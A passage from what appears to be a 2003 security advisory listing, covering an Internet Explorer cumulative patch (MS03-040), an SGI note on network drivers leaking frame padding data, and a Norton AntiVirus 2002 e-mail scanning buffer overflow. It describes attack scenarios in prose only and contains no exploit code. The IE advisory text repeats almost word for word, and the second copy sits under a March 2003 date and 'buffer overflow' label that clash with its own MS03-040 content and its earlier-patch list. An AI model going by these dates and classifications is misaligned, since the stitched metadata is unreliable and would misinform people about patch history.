A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server during 
XML data binding. It could be possible for an attacker who exploited 
this vulnerability to run arbitrary code on a user's system. If a 
user visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user action.
An attacker could also craft an HTML-based e-mail that would attempt 
to exploit this vulnerability.

A change has been made to the method by which Internet Explorer 
handles Dynamic HTML (DHTML) Behaviors in the Internet Explorer 
Restricted Zone.  It could be possible for an attacker exploiting a 
separate vulnerability (such as one of the two vulnerabilities 
discussed above) to cause Internet Explorer to run script code in the
security context of the Internet Zone. In addition, an attacker could
use Windows Media Player's (WMP) ability to open URL's to construct 
an attack. An attacker could also craft an HTML-based e-mail that 
could attempt to exploit this behavior.

To exploit these flaws, the attacker would have to create a specially
formed HTML-based e-mail and send it to the user. Alternatively an 
attacker would have to host a malicious Web site that contained a Web
page designed to exploit these vulnerabilities. The attacker would 
then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004, MS03-015,  MS03-020, and MS03-032, this 
cumulative patch will cause window.showHelp( ) to cease to function 
if you have not applied the HTML Help update. If you have installed 
the updated HTML Help control from Knowledge Base article 811630, you
will still be able to use HTML Help functionality after applying this
patch. 

In addition to applying this security patch it is recommended that 
users also install the Windows Media Player update referenced in 
Knowledge Base Article 828026.  This update is available from Windows
Update as well as the Microsoft Download Center for all supported 
versions of Windows Media Player. While not a security patch, this 
update contains a change to the behavior of Windows Media Player's 
ability to launch URL's to help protect against DHTML behavior based 
attacks.  Specifically, it restricts Windows Media Player's ability 
to launch URL's in the local computer zone from other zones.

  By default, Internet Explorer on Windows Server 2003 runs in Enhanced Security Configuration. This default configuration of Internet
Explorer blocks automatic exploitation of this attack. If Internet Explorer Enhanced Security Configuration has been disabled, the protections 
put in place that prevent this vulnerability from being automatically exploited would be removed. 

 In the Web-based attack scenario, the attacker would have to host a 
Web site that contained a Web page used to exploit this 
vulnerability.  An attacker would have no way to force a user to 
visit a malicious Web Site. Instead, the attacker would need to lure 
them there, typically by getting them to click a link that would take
them to the attacker's site.

 Exploiting the vulnerability would allow the attacker only the same 
privileges as the user. Users whose accounts are configured to have 
few privileges on the system would be at less risk than ones who 
operate with administrative privileges. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp  http://www.microsoft.com/security/security_bulletins/MS03-040.asp

Cumulative Patch for Internet Explorer

2003-03-10

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 6.0. 
In addition, it eliminates newly discovered 
vulnerabilities

Overview

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server in a 
popup window. It could be possible for an attacker who exploited this
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the attacker
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML-based e-mail that would attempt to 
exploit this vulnerability.

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server during 
XML data binding. It could be possible for an attacker who exploited 
this vulnerability to run arbitrary code on a user's system. If a 
user visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user action.
An attacker could also craft an HTML-based e-mail that would attempt 
to exploit this vulnerability.

A change has been made to the method by which Internet Explorer 
handles Dynamic HTML (DHTML) Behaviors in the Internet Explorer 
Restricted Zone.  It could be possible for an attacker exploiting a 
separate vulnerability (such as one of the two vulnerabilities 
discussed above) to cause Internet Explorer to run script code in the
security context of the Internet Zone. In addition, an attacker could
use Windows Media Player's (WMP) ability to open URL's to construct 
an attack. An attacker could also craft an HTML-based e-mail that 
could attempt to exploit this behavior.

To exploit these flaws, the attacker would have to create a specially
formed HTML-based e-mail and send it to the user. Alternatively an 
attacker would have to host a malicious Web site that contained a Web
page designed to exploit these vulnerabilities. The attacker would 
then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004, MS03-015,  MS03-020, and MS03-032, this 
cumulative patch will cause window.showHelp( ) to cease to function 
if you have not applied the HTML Help update. If you have installed 
the updated HTML Help control from Knowledge Base article 811630, you
will still be able to use HTML Help functionality after applying this
patch. 

In addition to applying this security patch it is recommended that 
users also install the Windows Media Player update referenced in 
Knowledge Base Article 828026.  This update is available from Windows
Update as well as the Microsoft Download Center for all supported 
versions of Windows Media Player. While not a security patch, this 
update contains a change to the behavior of Windows Media Player's 
ability to launch URL's to help protect against DHTML behavior based 
attacks.  Specifically, it restricts Windows Media Player's ability 
to launch URL's in the local computer zone from other zones.

  By default, Internet Explorer on Windows Server 2003 runs in Enhanced Security Configuration. This default configuration of Internet
Explorer blocks automatic exploitation of this attack. If Internet Explorer Enhanced Security Configuration has been disabled, the protections 
put in place that prevent this vulnerability from being automatically exploited would be removed. 

 In the Web-based attack scenario, the attacker would have to host a 
Web site that contained a Web page used to exploit this 
vulnerability.  An attacker would have no way to force a user to 
visit a malicious Web Site. Instead, the attacker would need to lure 
them there, typically by getting them to click a link that would take
them to the attacker's site.

 Exploiting the vulnerability would allow the attacker only the same 
privileges as the user. Users whose accounts are configured to have 
few privileges on the system would be at less risk than ones who 
operate with administrative privileges. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp  http://www.microsoft.com/security/security_bulletins/MS03-040.asp

Some Network Drivers May Leak Data

2003-03-06

Risk level: medium

Type: Information leakage

Source of info: SGI Security Team

Impact

Many network device drivers reuse old frame buffer data to pad packets, resulting in an information leakage vulnerability that may allow remote attackers to harvest sensitive information from affected devices.

Overview

SGI acknowledges the network device driver vulnerability reported by AtStake
and is currently investigating:

http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
http://www.kb.cert.org/vuls/id/412115
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001

Our initial investigation shows that our egXX and tgXX gigabit cards and
efXX interfaces in Origins and Octanes don't appear to be vulnerable.

No further information is available at this time.  As further information
becomes available, additional advisories will be issued.

For the protection of all our customers, SGI does not disclose, discuss or
confirm vulnerabilities until a full investigation has occurred and any
necessary patch(es) or release streams are available for all vulnerable and
supported Linux and IRIX operating systems.

Until SGI has more definitive information to provide, customers are
encouraged to assume all security vulnerabilities as exploitable and take
appropriate steps according to local site security policies and
requirements.

As further information becomes available, additional advisories will be
issued via the normal SGI security information distribution methods
including the wiretap mailing list.

Symantec Norton AntiVirus 2002 Buffer Overflow Vulnerability

2003-02-19

Risk level: high

Type: Buffer overflow

Source of info: CERT

Impact

The e-mail scanning function in Symantec Norton AntiVirus 2002 may cause a Buffer Overflow.

Overview

 The e-mail scanning function in Symantec Norton AntiVirus 2002 will cause a Buffer Overflow when it receives an e-mail message with a compressed file which includes a file with an unusually long filename.

An attacker could exploit this problem to execute arbitrary code with the privilege of the currently logged on user.